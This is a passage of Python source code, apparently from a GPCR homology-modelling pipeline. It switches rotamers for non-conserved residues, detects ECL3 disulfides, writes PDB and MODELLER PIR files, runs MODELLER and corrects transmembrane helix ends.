alignment_dict[aligned_seg][aligned_res]='.' if reference_dict[ref_seg][ref_res]!='-': ref_length+=1 else: trimmed_residues.append(ref_res.replace('x','.')) if '?' in temp_res: trimmed_residues.append(ref_res.replace('x','.')) trimmed_res_num+=1 non_cons_count+=1 continue if '-term' in ref_seg and (template_dict[temp_seg][temp_res]=='-' or reference_dict[ref_seg][ref_res]!=template_dict[temp_seg][temp_res] or len(main_pdb_array[ref_seg][ref_res])<atom_num_dict[template_dict[temp_seg][temp_res]]): trimmed_residues.append(ref_res.replace('x','.')) trimmed_res_num+=1 non_cons_count+=1 continue if (ref_res not in inconsistencies and alignment_dict[aligned_seg][aligned_res]!='.' and alignment_dict[aligned_seg][aligned_res]!='x' and alignment_dict[aligned_seg][aligned_res]!='-' and alignment_dict[aligned_seg][aligned_res]!='/' and len(main_pdb_array[ref_seg][ref_res.replace('x','.')])>=atom_num_dict[template_dict[temp_seg][temp_res]]): try: rot_test = Rotamer.objects.filter(structure=self.main_structure, residue__display_generic_number__label=dgn(ref_res, self.main_structure.protein_conformation)) rot_test = self.right_rotamer_select(rot_test) if rot_test.missing_atoms==True: alignment_dict[aligned_seg][aligned_res]='.' 
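                            # the stored rotamer is incomplete, so also downgrade the template
                            # residue to Gly; the position is then treated as non-conserved and
                            # its side chain is rebuilt from another template further below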
template_dict[temp_seg][temp_res]='G' else: raise Exception() except: conserved_residues[ref_res] = alignment_dict[aligned_seg][aligned_res] conserved_count+=1 if 'x' not in ref_res: num_in_loop = parse.gn_num_extract(ref_res,'|')[1] try: this_res = list(Residue.objects.filter(protein_conformation=self.prot_conf, protein_segment__slug=segment))[num_in_loop-1] except: trimmed_residues.append(ref_res.replace('x','.')) continue seq_num = str(this_res.sequence_number) try: self.update_template_source([seq_num],self.template_source[segment][seq_num][0],segment, just_rot=True) key_in_template_source = seq_num except: self.update_template_source([ggn(this_res.display_generic_number.label)], self.template_source[segment][ggn(this_res.display_generic_number.label)][0], segment,just_rot=True) key_in_template_source = ggn(this_res.display_generic_number.label) else: try: self.update_template_source([ref_res],self.template_source[segment][ref_res][0],segment, just_rot=True) key_in_template_source = ref_res except: missing_i = list(reference_dict[ref_seg].keys()).index(ref_res) gaps_before = [x for x in list(reference_dict[ref_seg].keys())[:missing_i] if reference_dict[ref_seg][x]=='-'] this_loop = Residue.objects.filter(protein_conformation__protein=self.reference_protein, protein_segment__slug=ref_seg[:4]) right_res = str(this_loop[missing_i-len(gaps_before)].sequence_number) self.update_template_source([right_res],self.template_source[segment][right_res][0],segment, just_rot=True) key_in_template_source = right_res if '_dis' in ref_seg or (ref_seg=='ECL2' and self.template_source['ECL2'][key_in_template_source][0]!=self.main_structure and '|' in ref_res): trimmed_residues.append(ref_res.replace('x','.')) gn = ref_res if ((gn in inconsistencies or alignment_dict[aligned_seg][aligned_res]=='.' 
and reference_dict[ref_seg][gn]!=template_dict[temp_seg][gn]) or (template_dict[temp_seg][temp_res]!='x' and len(main_pdb_array[ref_seg][ref_res.replace('x','.')])<atom_num_dict[template_dict[temp_seg][temp_res]])): non_cons_count+=1 gn_ = str(ref_res).replace('x','.') no_match = True if '|' in gn_: try: list_num = int(gn.split('|')[1])-1 gn = ggn(list(Residue.objects.filter(protein_conformation__protein=ref_prot, protein_segment__slug=ref_seg.split('_')[0]))[list_num].display_generic_number.label) gn_ = gn.replace('x','.') except: pass this_state_structs_with_resi, other_state_structs_with_resi = [],[] main_pdb_array, template_dict, non_cons_res_templates, switched_count, no_match = self.find_and_switch_rotamer(self.similarity_table, gn, gn_, reference_dict, ref_seg, ref_res, main_pdb_array, atom_num_dict, template_dict, temp_seg, temp_res, non_cons_res_templates, switched_count, no_match, segment) if no_match==True: main_pdb_array, template_dict, non_cons_res_templates, switched_count, no_match = self.find_and_switch_rotamer(self.similarity_table_other_states, gn, gn_, reference_dict, ref_seg, ref_res, main_pdb_array, atom_num_dict, template_dict, temp_seg, temp_res, non_cons_res_templates, switched_count, no_match, segment) if no_match==True: try: if 'free' not in ref_seg: residue = main_pdb_array[ref_seg][str(ref_res).replace('x','.')] main_pdb_array[ref_seg][str(ref_res).replace('x','.')] = residue[0:5] trimmed_residues.append(gn_) trimmed_res_num+=1 elif 'free' in ref_seg: trimmed_residues.append(gn_) trimmed_res_num+=1 except: logging.warning("Missing atoms in {} at {}".format(self.main_structure,gn)) elif alignment_dict[aligned_seg][aligned_res]=='x': trimmed_residues.append(gn.replace('x','.')) trimmed_res_num+=1 self.statistics.add_info('ref_seq_length', ref_length) self.statistics.add_info('conserved_num', conserved_count) self.statistics.add_info('non_conserved_num', non_cons_count) self.statistics.add_info('trimmed_residues_num', trimmed_res_num) self.statistics.add_info('non_conserved_switched_num', switched_count) self.statistics.add_info('conserved_residues', conserved_residues) self.statistics.add_info('non_conserved_residue_templates', non_cons_res_templates) return [main_pdb_array, reference_dict, template_dict, alignment_dict, trimmed_residues] def find_and_switch_rotamer(self, similarity_table, gn, gn_, reference_dict, ref_seg, ref_res, main_pdb_array, atom_num_dict, template_dict, temp_seg, temp_res, non_cons_res_templates, switched_count, no_match, segment): parse = GPCRDBParsingPDB() for struct in similarity_table: try: alt_temp = parse.fetch_residues_from_pdb(struct, [gn]) if reference_dict[ref_seg][ref_res]==PDB.Polypeptide.three_to_one( alt_temp[gn_][0].get_parent().get_resname()): orig_res = main_pdb_array[ref_seg][str(ref_res).replace('x','.')] alt_res = alt_temp[gn_] if len(alt_res)!=atom_num_dict[reference_dict[ref_seg][ref_res]]: continue superpose = sp.RotamerSuperpose(orig_res, alt_res) new_atoms = superpose.run() if superpose.backbone_rmsd>0.5: continue main_pdb_array[ref_seg][str(ref_res).replace('x','.')] = new_atoms template_dict[temp_seg][temp_res] = reference_dict[ref_seg][ref_res] non_cons_res_templates[gn] = struct switched_count+=1 no_match = False if 'x' not in ref_res: num_in_loop = parse.gn_num_extract(ref_res,'|')[1] seq_num = str(list(Residue.objects.filter(protein_conformation=self.prot_conf, protein_segment__slug=segment))[num_in_loop-1].sequence_number) self.update_template_source([seq_num],struct,segment,just_rot=True) else: 
self.update_template_source([ref_res],struct,segment,just_rot=True) break except: pass return main_pdb_array, template_dict, non_cons_res_templates, switched_count, no_match def ECL3_disulfide(self, reference_dict): c61, c62 = False, False try: if reference_dict['TM6']['6x61']=='C': c61 = True except: pass try: if reference_dict['TM6']['6x62']=='C': c62 = True except: pass ecl3_lab = [i for i in reference_dict if i.startswith('ECL3')][0] ecl3_c = [] for gn, res in reference_dict[ecl3_lab].items(): if res=='C': ecl3_c.append(gn) if c61==True and len(ecl3_c)>0: return ['6x61', ecl3_c[0]] elif c62==True and len(ecl3_c)>0: return ['6x62', ecl3_c[0]] elif len(ecl3_c)>=2: return [ecl3_c[0], ecl3_c[1]] else: return [0,0] def write_homology_model_pdb(self, filename, main_pdb_array, alignment, trimmed_residues=[], disulfide_pairs=[]): ''' Write PDB file from pdb array to file. @param filename: str, filename of output file \n @param main_pdb_array: OrderedDict(), of atoms of pdb, where keys are generic numbers/residue numbers and values are list of atoms. Output of GPCRDBParsingPDB.pdb_array_creator(). @param alignment: AlignedReferenceTemplate class, alignment of reference and template. @trimmed_residues: list, list of generic numbers that are trimmed/to be modeled by MODELLER. ''' key = '' res_num = 0 counter_num = 0 atom_num = 0 trimmed_resi_nums = OrderedDict() helix_restraints = [] prev_seg = '0' icl3_mid = None disulfide_nums = [[0,0],[0,0]] with open(filename,'w+') as f: for seg_id, segment in main_pdb_array.items(): if seg_id!='TM1' and prev_seg!='0' and seg_id.startswith('T') and prev_seg.startswith('T'): atom_num+=1 # f.write("\nTER{} {} {}{}".format(str(atom_num).rjust(8),atom.get_parent().get_resname(),str(self.main_template_preferred_chain)[0],str(res_num).rjust(4))) trimmed_segment = OrderedDict() for key in segment: res_num+=1 counter_num+=1 for i, d_p in enumerate(disulfide_pairs): for j, d in enumerate(d_p): try: if key==d.replace('x','.'): disulfide_nums[i][j] = res_num break except: pass try: if alignment.reference_dict[seg_id][key.replace('.','x')] in ['-','x'] or alignment.reference_dict[seg_id][key] in ['-','x']: counter_num-=1 res_num-=1 continue except: pass if segment[key]=='/': atom_num+=1 # f.write("\nTER{} {} {}{}".format(str(atom_num).rjust(8),atom.get_parent().get_resname(),str(self.main_template_preferred_chain)[0],str(res_num).rjust(4))) icl3_mid = counter_num res_num-=1 counter_num-=1 continue if key in trimmed_residues: trimmed_segment[key] = counter_num if 'x' in segment[key]: if '?' in key: atom_num+=1 # f.write("\nTER{} {} {}{}".format(str(atom_num).rjust(8),atom.get_parent().get_resname(),str(self.main_template_preferred_chain)[0],str(res_num).rjust(4))) continue else: helix_restraints.append(counter_num) continue if 'x' in segment[key]: atom_num+=1 # f.write("\nTER{} {} {}{}".format(str(atom_num).rjust(8),atom.get_parent().get_resname(),str(self.main_template_preferred_chain)[0],str(res_num).rjust(4))) continue if '?' 
in key and '-' in segment[key]: atom_num+=1 # f.write("\nTER{} {} {}{}".format(str(atom_num).rjust(8),atom.get_parent().get_resname(),str(self.main_template_preferred_chain)[0],str(res_num).rjust(4))) continue if '-term' in seg_id and segment[key]=='-': continue if len(key.split('.'))==3 and segment[key]=='-': atom_num+=1 continue for atom in main_pdb_array[seg_id][key]: atom_num+=1 coord = list(atom.get_coord()) coord1 = "%8.3f"% (coord[0]) coord2 = "%8.3f"% (coord[1]) coord3 = "%8.3f"% (coord[2]) if str(atom.get_id())=='CA': if len(key)==4: bfact = "%6.2f"% (float(key)) elif '.' not in key: bfact = "%6.2f"% (float(atom.get_bfactor())) else: key_split = key.split('.') if '.' in key and len(key_split[1])==3: bfact = " -%4.2f"% (float(key)) elif len(key_split)==3: bfact = "%6.2f"% (float(atom.get_bfactor())) else: bfact = " %5.2f"% (float(key)) else: bfact = "%6.2f"% (float(atom.get_bfactor())) occupancy = "%6.2f"% (atom.get_occupancy()) template=""" ATOM{atom_num} {atom}{res} {chain}{res_num}{coord1}{coord2}{coord3}{occupancy}{bfactor}{atom_s} """ context={"atom_num":str(atom_num).rjust(7), "atom":str(atom.get_id()).ljust(4), "res":atom.get_parent().get_resname(), "chain":str(self.main_template_preferred_chain)[0], "res_num":str(res_num).rjust(4), "coord1":coord1.rjust(12), "coord2":coord2.rjust(8), "coord3":coord3.rjust(8), "occupancy":str(occupancy).rjust(3), "bfactor":str(bfact).rjust(4), "atom_s":str(str(atom.get_id())[0]).rjust(12)} f.write(template.format(**context)) trimmed_resi_nums[seg_id] = trimmed_segment prev_seg = seg_id[:4] f.write("\nTER\n") if self.reference_entry_name!=self.main_structure.protein_conformation.protein.parent.entry_name: atom_num+=1 # f.write("\nTER{} {} {}{}".format(str(atom_num).rjust(8),atom.get_parent().get_resname(),str(self.main_template_preferred_chain)[0],str(res_num).rjust(4))) return trimmed_resi_nums, helix_restraints, icl3_mid, disulfide_nums def create_PIR_file(self, reference_dict, template_dict, template_file, hetatm_count, water_count): ''' Create PIR file from reference and template alignment (AlignedReferenceAndTemplate). @param reference_dict: AlignedReferenceAndTemplate.reference_dict @param template_dict: AlignedReferenceAndTempalte.template_dict @template_file: str, name of template file with path @param hetatm_count: int, number of hetero atoms @param water_count: int, number of water atoms ''' ref_sequence, temp_sequence = '','' res_num = 1 with open(template_file,'r') as f: lines = f.readlines() for line in lines: try: pdb_re = re.search('(ATOM[A-Z\s\d]{13}\S{3}\s\S\s+)(\d+)([A-Z\s\d.-]{49,53})',line) start_num = pdb_re.group(2) break except: try: pdb_re = re.search('(ATOM[A-Z\s\d]{13}\S{3}\s+)(\d+)([A-Z\s\d.-]{49,53})',line) start_num = pdb_re.group(2) break except: pass for ref_seg, temp_seg in zip(reference_dict, template_dict): if ref_seg=='HN': ref_sequence+='/' temp_sequence+='/' for ref_res, temp_res in zip(reference_dict[ref_seg], template_dict[temp_seg]): if reference_dict[ref_seg][ref_res] in ['-','x']: if ref_seg in ['HN', 'hns1', 'S1', 's1h1', 'H1', 'h1ha', 'HA', 'hahb', 'HB', 'hbhc', 'HC', 'hchd', 'HD', 'hdhe', 'HE', 'hehf', 'HF', 'hfs2', 'S2', 's2s3', 'S3', 's3h2', 'H2', 'h2s4', 'S4', 's4h3', 'H3', 'h3s5', 'S5', 's5hg', 'HG', 'hgh4', 'H4', 'h4s6', 'S6', 's6h5', 'H5']: res_num+=1 continue else: ref_sequence+=reference_dict[ref_seg][ref_res] if template_dict[temp_seg][temp_res] in ['-','x']: temp_sequence+='-' else: temp_sequence+=template_dict[temp_seg][temp_res] res_num+=1 for i in range(hetatm_count): ref_sequence+='.' 
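            # MODELLER PIR convention: '.' stands for a generic hetero (BLK)
            # residue and 'w' for a water molecule, one symbol per HETATM entry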
temp_sequence+='.' for i in range(water_count): ref_sequence+='w' temp_sequence+='w' self.model_sequence = temp_sequence with open("./structure/PIR/"+self.uniprot_id+"_"+self.state+".pir", 'w+') as output_file: template=""" >P1;{temp_file} structure:{temp_file}:{start}:{chain}:{res_num}:{chain}:::: {temp_sequence}* >P1;{uniprot} sequence:{uniprot}:::::::: {ref_sequence}* """ context={"temp_file":template_file, "start":start_num, "chain":self.main_template_preferred_chain, "res_num":res_num, "temp_sequence":temp_sequence, "uniprot":self.uniprot_id, "ref_sequence":ref_sequence} output_file.write(template.format(**context)) def run_MODELLER(self, pir_file, template, reference, number_of_models, output_file_name, atom_dict=None, helix_restraints=[], icl3_mid=None, disulfide_nums=[]): ''' Build homology model with MODELLER. @param pir_file: str, file name of PIR file with path \n @param template: str, file name of template with path \n @param reference: str, Uniprot code of reference sequence \n @param number_of_models: int, number of models to be built \n @param output_file_name: str, name of output file @param atom_dict: nested OrderedDict(), atoms to model with MODELLER organized by segments and generic numbers, default=None @param helix_restraints: list, list of generic numbers that should be modelled as helical regions by MODELLER, default=[] @param icl3_mid: int, position of the break in the middle of ICL3, default=None ''' log.none() env = environ(rand_seed=1028) #!!random number generator if self.revise_xtal==True: ref_prot = self.reference_protein.parent else: ref_prot = self.reference_protein if ref_prot==self.main_structure.protein_conformation.protein.parent: env.io.hetatm = True env.io.water = True if atom_dict==None: a = automodel(env, alnfile = pir_file, knowns = template, sequence = reference, assess_methods=(assess.DOPE)) else: a = HomologyMODELLER(env, alnfile = pir_file, knowns = template, sequence = reference, assess_methods=(assess.DOPE), atom_selection=atom_dict, helix_restraints=helix_restraints, icl3_mid=icl3_mid, disulfide_nums=disulfide_nums) a.starting_model = 1 a.ending_model = number_of_models a.md_level = refine.slow path = "./structure/homology_models/" if not os.path.exists(path): os.mkdir(path) a.make() # Get a list of all successfully built models from a.outputs ok_models = [x for x in a.outputs if x['failure'] is None] if len(ok_models)==0: os.rename("./"+template, output_file_name) return 0 # Rank the models by DOPE score key = 'DOPE score' if sys.version_info[:2] == (2,3): # Python 2.3's sort doesn't have a 'key' argument ok_models.sort(lambda a,b: cmp(a[key], b[key])) else: ok_models.sort(key=lambda a: a[key]) # Get top model m = ok_models[0] # print("Top model: %s (DOPE score %.3f)" % (m['name'], m[key])) for file in os.listdir("./"): if file==m['name']: os.rename("./"+file, output_file_name) elif file.startswith(self.uniprot_id): os.remove("./"+file) class SilentModeller(object): ''' No text to console. 
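    Redirects sys.stdout to os.devnull for the duration of a with-block;
    a minimal usage sketch (noisy_call is illustrative):

        with SilentModeller():
            noisy_call()  # anything printed inside the block is discarded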
''' def __enter__(self): self._stdout = sys.stdout sys.stdout = open(os.devnull, 'w') def __exit__(self, *args): sys.stdout.close() sys.stdout = self._stdout class HomologyMODELLER(automodel): def __init__(self, env, alnfile, knowns, sequence, assess_methods, atom_selection, helix_restraints=[], icl3_mid=None, disulfide_nums=[]): super(HomologyMODELLER, self).__init__(env, alnfile=alnfile, knowns=knowns, sequence=sequence, assess_methods=assess_methods) self.atom_dict = atom_selection self.helix_restraints = helix_restraints self.icl3_mid = icl3_mid self.disulfide_nums = disulfide_nums def identify_chain(self, seq_num): if len(self.chains)==2: if self.icl3_mid==None: return 'A' elif seq_num<self.icl3_mid: return 'A' elif seq_num>=self.icl3_mid: return 'B' else: return '' else: return '' def find_helix_restraints(self): start = 0 prev = 0 out = [] for i in self.helix_restraints: if prev==0: start = i if i==prev+1: pass elif prev!=0: out.append([start,prev]) start = i prev=i if len(self.helix_restraints)>0: out.append([start,prev]) return out def select_atoms(self): selection_out = [] for seg_id, segment in self.atom_dict.items(): for gn, atom in segment.items(): chain = self.identify_chain(atom) selection_out.append(self.residues[str(atom)+':{}'.format(chain)]) return selection(selection_out) def special_restraints(self, aln): rsr = self.restraints for i in self.find_helix_restraints(): chain = self.identify_chain(i[0]) for j, k in self.atom_dict.items(): segment = sorted(list(k.items()),key=lambda e: e[0]) if segment==[]: continue if j=='H8' and i[0]==segment[0][1] and i[1]==segment[-1][1]: rsr.add(secondary_structure.alpha(self.residue_range('{}:{}'.format(i[0]-4,chain),'{}:{}'.format(i[1],chain)))) break elif i[0]==segment[0][1]: rsr.add(secondary_structure.alpha(self.residue_range('{}:{}'.format(i[0],chain),'{}:{}'.format(i[1]+4,chain)))) break elif i[1]==segment[-1][1]: rsr.add(secondary_structure.alpha(self.residue_range('{}:{}'.format(i[0]-4,chain),'{}:{}'.format(i[1],chain)))) break def special_patches(self, aln): for d in self.disulfide_nums: if d[0]==0: continue try: self.patch(residue_type='DISU', residues=(self.residues[str(d[0])], self.residues[str(d[1])])) except: pass # def make(self): # with SilentModeller(): # super(HomologyMODELLER, self).make() class SegmentEnds(object): def __init__(self): self.start = None self.end = None self.protein_segment = None def __repr__(self): return "<{},{},{}>".format(self.start,self.end,self.protein_segment) class HelixEndsModeling(HomologyModeling): ''' Class for modeling the helix ends of GPCRs. 
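    Helix ends are handled as OrderedDicts mapping segment slugs to
    [start, end] generic number pairs, e.g. (illustrative values only):

        OrderedDict([('TM1', ['1x30', '1x60']), ('H8', ['8x47', '8x60'])])

    correct_helix_ends() trims template residues that extend beyond the
    annotated ends and grafts missing end residues onto the model by
    superposing them from the next closest template.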
''' def __init__(self, similarity_table, template_source, main_structure): self.helix_ends = OrderedDict() self.helix_end_mods = OrderedDict() self.main_pdb_array = OrderedDict() self.alignment = OrderedDict() self.similarity_table = similarity_table self.template_source = template_source self.main_structure = main_structure self.templates_to_skip = OrderedDict([('TM1',[[],[]]),('TM2',[[],[]]),('TM3',[[],[]]),('TM4',[[],[]]), ('TM5',[[],[]]),('TM6',[[],[]]),('TM7',[[],['5UNF','5UNG','5UNH']]),('H8',[[],[]])]) def find_ends(self, structure, protein_conformation): raw_res = Residue.objects.filter(protein_conformation=protein_conformation).exclude( protein_segment=None).order_by('protein_segment_id').distinct('protein_segment_id') raw_segs = [i.protein_segment for i in raw_res] ends = [] for i in raw_segs: if i.slug[0] not in ['T','H']: continue end = SegmentEnds() end.start = list(Residue.objects.filter(protein_conformation=protein_conformation, protein_segment__slug=i))[0].sequence_number end.end = list(Residue.objects.filter(protein_conformation=protein_conformation, protein_segment__slug=i))[-1].sequence_number end.protein_segment = i ends.append([end, structure]) return ends def fetch_struct_helix_ends_from_db(self, structure, H8_alt=None): ''' Returns structure's helix end generic numbers after updating them with annotated data. ''' raw = self.find_ends(structure, structure.protein_conformation) anno_conf = ProteinConformation.objects.get(protein=structure.protein_conformation.protein.parent) annotated = self.find_ends(structure, anno_conf) if H8_alt!=None and H8_alt!=structure: H8_raw_conf = ProteinConformation.objects.get(protein=H8_alt.protein_conformation.protein.parent) if raw[-1][0].protein_segment.slug=='H8': try: raw[-1] = [i for i in self.find_ends(H8_alt,H8_raw_conf) if i[0].protein_segment.slug=='H8'][0] except: pass else: try: raw.append([i for i in self.find_ends(H8_alt,H8_raw_conf) if i[0].protein_segment.slug=='H8'][0]) except: pass if annotated!=[]: if annotated[-1][0].protein_segment.slug=='H8': try: annotated[-1] = [i for i in self.find_ends( H8_alt,H8_alt.protein_conformation) if i[0].protein_segment.slug=='H8'][0] except: pass else: try: annotated.append([i for i in self.find_ends( H8_alt,H8_alt.protein_conformation) if i[0].protein_segment.slug=='H8'][0]) except: pass ends = OrderedDict() for i in raw: if i[0].protein_segment.slug[0]=='T' or i[0].protein_segment.slug=='H8': if len(list(Residue.objects.filter(protein_conformation=i[1].protein_conformation, protein_segment=i[0].protein_segment)))==0: continue start_found = False break_point = 0 while start_found==False: if break_point==20: i[0].start = None break try: if Residue.objects.get(protein_conformation=i[1].protein_conformation, sequence_number=i[0].start).generic_number==None: i[0].start+=1 else: start_found = True except: break_point+=1 i[0].start+=1 s = Residue.objects.get(protein_conformation=i[1].protein_conformation,sequence_number=i[0].start) end_found = False break_point = 0 while end_found==False: if break_point==20: i[0].end = None break try: if Residue.objects.get(protein_conformation=i[1].protein_conformation, sequence_number=i[0].end).generic_number==None: i[0].end-=1 else: end_found = True except: break_point+=1 i[0].end-=1 e = Residue.objects.get(protein_conformation=i[1].protein_conformation,sequence_number=i[0].end) ends[s.protein_segment.slug] = [ggn(s.display_generic_number.label),ggn(e.display_generic_number.label)] for j in annotated: if j[0].protein_segment.slug[0]=='T' or 
j[0].protein_segment.slug=='H8': if j[0].start!=0: found_start = False break_point = 0 while found_start==False: if break_point==20: j[0].start = None break try: if Residue.objects.get(protein_conformation=j[1].protein_conformation, sequence_number=j[0].start).generic_number!=None: found_start = True else: raise Exception() except: break_point+=1 j[0].start+=1 if j[0].start!=None: sa = Residue.objects.get(protein_conformation=j[1].protein_conformation,sequence_number=j[0].start) ends[j[0].protein_segment.slug][0] = ggn(sa.display_generic_number.label) if j[0].end!=0: found_end = False break_point = 0 while found_end==False: if break_point==20: j[0].end = None break try: if Residue.objects.get(protein_conformation=j[1].protein_conformation, sequence_number=j[0].end).generic_number!=None: found_end = True else: raise Exception() except: break_point+=1 j[0].end-=1 if j[0].end!=None: ea = Residue.objects.get(protein_conformation=j[1].protein_conformation,sequence_number=j[0].end) try: ends[j[0].protein_segment.slug][1] = ggn(ea.display_generic_number.label) except: pass return ends def fetch_struct_helix_ends_from_array(self, array): ''' Returns helix ends from structure array (GPCRDBParsingPDB.pdb_array_creator()). ''' ends = OrderedDict() for seg_lab, seg in array.items(): if seg_lab[0]=='T' or seg_lab=='H8': try: ends[seg_lab] = [list(seg.keys())[0].replace('.','x'),list(seg.keys())[-1].replace('.','x')] except: pass return ends def correct_helix_ends(self, main_structure, main_pdb_array, a, template_source, separate_H8=None): ''' Updates main template structure with annotated helix ends. If helix is too long, it removes residues, if it is too short, it superpositions residues from next closest template. Updates alignment with changes. ''' modifications = {'added':{'TM1':[[],[]],'TM2':[[],[]],'TM3':[[],[]],'TM4':[[],[]],'TM5':[[],[]],'TM6':[[],[]], 'TM7':[[],[]], 'H8':[[],[]]}, 'removed':{'TM1':[[],[]],'TM2':[[],[]],'TM3':[[],[]],'TM4':[[],[]],'TM5':[[],[]],'TM6':[[],[]], 'TM7':[[],[]], 'H8':[[],[]]}} try: H8_alt = template_source['H8']['8x50'][0] if separate_H8==True: raise Exception() except: H8_alt = None raw_helix_ends = self.fetch_struct_helix_ends_from_array(main_pdb_array) anno_helix_ends = self.fetch_struct_helix_ends_from_db(main_structure, H8_alt) # Force active state with main template 5UNF, 5UNG or 5UNH to get new TM7 end skip_template = False if separate_H8 and main_structure.pdb_code.index in ['5UNF','5UNG','5UNH']: anno_helix_ends['TM7'][1] = '7x48' skip_template = True for lab,seg in a.template_dict.items(): if separate_H8==True: if lab=='H8': continue elif separate_H8==False: if lab!='H8': continue for gn,res in seg.items(): try: if lab[0] in ['H']: if res!='-': r = Residue.objects.get(protein_conformation=H8_alt.protein_conformation, display_generic_number__label=dgn( gn,H8_alt.protein_conformation)) if len(Rotamer.objects.filter(structure=H8_alt,residue=r))<1: raise Exception() except: a.template_dict[lab][gn] = 'x' a.alignment_dict[lab][gn] = 'x' parser = GPCRDBParsingPDB() for raw_seg, anno_seg in zip(raw_helix_ends, anno_helix_ends): if separate_H8==True: if raw_seg=='H8': continue elif separate_H8==False: if raw_seg!='H8': continue if H8_alt!=None and H8_alt!=main_structure and raw_seg=='H8': template = H8_alt else: template = main_structure protein_conf = ProteinConformation.objects.get(protein=template.protein_conformation.protein.parent) try: s_dif = parser.gn_comparer(raw_helix_ends[raw_seg][0],anno_helix_ends[anno_seg][0], protein_conf) except: try: s_dif = 
parser.gn_comparer(raw_helix_ends[raw_seg][0],anno_helix_ends[anno_seg][0], template.protein_conformation) protein_conf = template.protein_conformation except: for i in range(int(raw_helix_ends[raw_seg][0].split('x')[1]), int(anno_helix_ends[anno_seg][0].split('x')[1])): a.template_dict[raw_seg]['8x{}'.format(str(i))]='x' a.alignment_dict[raw_seg]['8x{}'.format(str(i))]='x' s_dif=0 if s_dif<0: s_gn = Residue.objects.get(protein_conformation=protein_conf, display_generic_number__label=dgn(raw_helix_ends[raw_seg][0], protein_conf)) seq_nums = [i for i in range(s_gn.sequence_number,s_gn.sequence_number-s_dif)] gns = [ggn(j.display_generic_number.label) for j in list(Residue.objects.filter( protein_conformation=protein_conf, sequence_number__in=seq_nums))] for gn in gns: if gn in a.template_dict[raw_seg]: a.template_dict[raw_seg][gn]='x' a.alignment_dict[raw_seg][gn]='x' else: del main_pdb_array[raw_seg][gn.replace('x','.')] modifications['removed'][raw_seg][0].append(gn) protein_conf = ProteinConformation.objects.get(protein=template.protein_conformation.protein.parent) try: e_dif = parser.gn_comparer(raw_helix_ends[raw_seg][1],anno_helix_ends[anno_seg][1], protein_conf) except: try: e_dif = parser.gn_comparer(raw_helix_ends[raw_seg][1],anno_helix_ends[anno_seg][1], template.protein_conformation) protein_conf = template.protein_conformation except: for i in range(int(anno_helix_ends[anno_seg][1].split('x')[1])+1, int(raw_helix_ends[raw_seg][1].split('x')[1])+1): a.template_dict[raw_seg]['8x{}'.format(str(i))]='x' a.alignment_dict[raw_seg]['8x{}'.format(str(i))]='x' e_dif = 0 if e_dif>0: e_gn = Residue.objects.get(protein_conformation=protein_conf, display_generic_number__label=dgn(raw_helix_ends[raw_seg][1], protein_conf)) seq_nums = [i for i in range(e_gn.sequence_number-e_dif+1,e_gn.sequence_number+1)] gns = [ggn(j.display_generic_number.label) for j in list(Residue.objects.filter( protein_conformation=protein_conf, sequence_number__in=seq_nums))] for gn in gns: a.template_dict[raw_seg][gn]='x' a.alignment_dict[raw_seg][gn]='x' try: a.reference_dict[raw_seg][gn] except: a.reference_dict[raw_seg][gn]='x' self.helix_ends = raw_helix_ends for ref_seg, temp_seg, align_seg in zip(a.reference_dict, a.template_dict, a.alignment_dict): if separate_H8==True: if ref_seg=='H8': continue elif separate_H8==False: if ref_seg!='H8': continue if ref_seg=='H8' and H8_alt!=None: first_res = Residue.objects.get(protein_conformation=H8_alt.protein_conformation, display_generic_number__label=dgn(raw_helix_ends[ref_seg][0], H8_alt.protein_conformation)).sequence_number for h in list(a.template_dict[temp_seg].keys())[::-1]: if a.template_dict[temp_seg][h]!='x': raw_helix_ends[ref_seg][1]=h break last_res = Residue.objects.get(protein_conformation=H8_alt.protein_conformation, display_generic_number__label=dgn(raw_helix_ends[ref_seg][1], H8_alt.protein_conformation)).sequence_number temp_seg_seq_len = len(list(Residue.objects.filter(protein_conformation=H8_alt.protein_conformation, sequence_number__in=range(first_res,last_res+1)))) mid = temp_seg_seq_len/2 elif ref_seg[0]=='T': first_res = Residue.objects.get(protein_conformation=main_structure.protein_conformation, display_generic_number__label=dgn(raw_helix_ends[ref_seg][0], main_structure.protein_conformation)).sequence_number last_res = Residue.objects.get(protein_conformation=main_structure.protein_conformation, display_generic_number__label=dgn(raw_helix_ends[ref_seg][1], main_structure.protein_conformation)).sequence_number temp_seg_seq_len = 
len(list(Residue.objects.filter(protein_conformation=main_structure.protein_conformation, sequence_number__in=range(first_res,last_res+1)))) mid = temp_seg_seq_len/2 if ref_seg[0] not in ['T','H']: continue if separate_H8==True: if ref_seg=='H8': continue elif separate_H8==False: if ref_seg!='H8': continue offset = 0 increase_offset = True full_template_dict_seg = deepcopy(a.template_dict[temp_seg]) delete_r = set() delete_t = set() delete_a = set() delete_ar = set() for ref_res, temp_res, align_res in zip(a.reference_dict[ref_seg],a.template_dict[temp_seg], a.alignment_dict[align_seg]): if a.template_dict[temp_seg][temp_res]=='x' and increase_offset==True: offset+=1 elif a.template_dict[temp_seg][temp_res]!='x': increase_offset = False if a.template_dict[temp_seg][temp_res]=='-' and self.main_structure.pdb_code.index not in ['6BQG','6BQH'] and ref_res!='1x36': continue if a.reference_dict[ref_seg][ref_res]=='x': if list(full_template_dict_seg.keys()).index(ref_res)<mid+offset: modifications['removed'][ref_seg][0].append(ref_res) else: modifications['removed'][ref_seg][1].append(ref_res) delete_r.add((ref_seg,ref_res)) delete_t.add((temp_seg,temp_res)) delete_a.add((align_seg,align_res)) delete_ar.add((ref_seg, ref_res.replace('x','.'))) elif a.template_dict[temp_seg][temp_res]=='x' or (temp_seg[0]=='T' and temp_res.replace('x','.') not in list(main_pdb_array[temp_seg])): if list(full_template_dict_seg.keys()).index(temp_res)<mid+offset: modifications['added'][temp_seg][0].append(temp_res) else: modifications['added'][temp_seg][1].append(temp_res) for i,ii in delete_r: del a.reference_dict[i][ii] for i,ii in delete_t: del a.template_dict[i][ii] for i,ii in delete_a: del a.alignment_dict[i][ii] for i,ii in delete_ar: try: del main_pdb_array[i][ii] except: pass if ref_seg[0]=='T' or ref_seg=='H8': if len(modifications['added'][ref_seg][0])>0: self.helix_ends[ref_seg][0] = modifications['added'][ref_seg][0][0] if len(modifications['added'][ref_seg][1])>0: self.helix_ends[ref_seg][1] = modifications['added'][ref_seg][1][-1] if len(modifications['removed'][ref_seg][0])>0: self.helix_ends[ref_seg][0] = parser.gn_indecer(modifications['removed'][ref_seg][0][-1], 'x', 1) if len(modifications['removed'][ref_seg][1])>0: self.helix_ends[ref_seg][1] = parser.gn_indecer(modifications['removed'][ref_seg][1][0], 'x', -1) if 